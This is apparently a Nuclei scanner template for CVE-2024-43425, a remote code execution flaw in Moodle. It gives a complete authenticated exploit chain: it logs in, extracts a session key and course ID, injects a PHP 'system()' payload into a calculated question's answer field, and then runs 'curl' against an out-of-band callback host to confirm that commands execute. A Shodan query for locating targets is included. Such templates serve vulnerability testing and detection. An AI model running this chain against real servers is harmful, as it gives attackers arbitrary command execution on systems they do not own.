id: CVE-2024-43425
info:
name: Moodle - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
reference:
- https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
- https://blog.redteam-pentesting.de/2024/moodle-rce/
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
classification:
cvss-score: 9.8
cve-id: CVE-2024-43425
metadata:
verified: true
max-request: 1
shodan-query: title:"Moodle"
tags: cve,cve2024,moodile,rce,authenticated
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
http:
- raw:
- |
GET /login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
anchor=&logintoken={{token}}&username={{username}}&password={{password}}
host-redirects: true
extractors:
- type: regex
part: body
name: token
group: 1
regex:
- 'name="logintoken" value="([a-zA-Z0-9]+)">'
internal: true
- raw:
- |
GET /my/courses.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sesskey
part: body
internal: true
group: 1
regex:
- '"sesskey":"([^"]+)"'
- raw:
- |
POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]
extractors:
- type: json
part: body
name: courseid
json:
- ".[].data.courses[0].id"
internal: true
- raw:
- |
POST /question/bank/editquestion/question.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes
extractors:
- type: regex
part: header
name: id
group: 1
internal: true
regex:
- "&id=([0-9]+)&"
- raw:
- |
POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page
extractors:
- type: regex
part: header
name: rceurl
group: 1
internal: true
regex:
- "Location: https?://.*?/question/(.*)&returnurl"
- raw:
- |
GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 490a0046304402206751ee480090a5e57009256b124a5b385fb35e0ad2c554e3e4e9081f07d433a602205a3c2bb69019ccd312411579022b8f9f0ffff59aebc705f23ef418df865ad97a:922c64590222798bb761d5b6d8e72950